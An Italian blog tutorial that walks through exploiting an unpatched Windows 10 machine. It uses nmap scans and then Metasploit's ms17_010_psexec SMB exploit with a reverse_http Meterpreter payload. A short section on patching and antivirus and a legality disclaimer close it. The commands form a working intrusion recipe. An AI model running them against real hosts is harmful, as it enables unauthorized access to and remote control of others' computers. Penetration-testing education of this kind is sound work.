
Come effettuare test vulnerabilità Metasploit
Cari lettori di Tecnogalxy, oggi parleremo del Framework Metasploit. Il Metasploit Project è un progetto di sicurezza informatica che fornisce informazioni sulle vulnerabilità, semplifica le operazioni di penetration testing e aiuta nello sviluppo di sistemi di rilevamento di intrusioni.
In questo articolo andremo a vedere il suo funzionamento e la sua potenza facendo un test reale, partiamo subito con il nostro test utilizzando come sempre il nostro caro amico Kali Linux 😊.
Esecuzione test vulnerabilità Metasploit
Come prima cosa facciamo una scansione della rete per vedere quali device , computer ci sono collegati, nel mio caso il computer con sistema operativo Windows 10 da testare ha un indirizzo ip 192.168.0.186.
Adesso dobbiamo fare una scansione dell’ host da testare per vedere lo status, ovviamente lo facciamo con nmap, apriamo una shell e scriviamo il seguente comando:
sudo nmap 192.168.0.186
Questa macchina non risponde ai ping che vengono inviati, no problem aggiungiamo l’opzione -Pn
sudo nmap 192.168.0.186 -Pn (-Pn effettua la scansione senza il ping)
Questo sarà il risultato dopo la scansione dell’ host con nmap.
Adesso dobbiamo vedere la versione dei servizi attivi scrivendo il seguente comando:
sudo nmap 192.168.0.186 -Pn -sV (-sV Controlla la versione del servizio attivo)
Adesso facciamo partire il Framework Metasploit, apriamo una shell e scriviamo:
sudo msfconsole
Facciamo la seguente ricerca
grep scanner search smb
Questo sarà il risultato
Per il nostro test utilizziamo il nuomero 41
use auxiliary/scanner/smb/impacket/wmiexec
Con il comando show options potremo vedere le info che servono.
Come prima cosa controlliamo se il nostro host è vulnerabile scrivendo:
set RHOSTS 192.168.0.186
run
Bingo, è vulnerabile:
Adesso dobbiamo cercare l’exploit adatto, scriviamo il seguente comando:
grep exploit search smb
Per il nostro test prenderemo il numero 39, scriviamo il comando:
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.0.186
set payload windows/meterpreter/reverse_http
Scriviamo show options per vedere se servono altre info:
Lanciamo l’exploit:
exploit
Adesso scriviamo il comando:
sysinfo
Come difendersi da questo attacco?
Se questo host fosse stato aggiornato con le patch di Windows non avrei potuto violarlo, per questo è molto importante effettuare tutti gli aggiornamenti proposti da Windows, avere un buon antivirus e tenerlo ovviamente sempre aggiornato.
Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.
Al prossimo articolo 😊.
N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.
Giorgio Perego
IT Manager
Leggi anche:
- Come Navigare Sicuri
- I vantaggi in termini di sicurezza derivanti dall’utilizzo delle VDR nelle transazioni immobiliari
- Cos’è il cashback: caratteristiche, utilità, settori
- Wire ha appena ricevuto un finanziamento di 30 milioni
- Woolsocks: Regali di Natale GRATIS
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI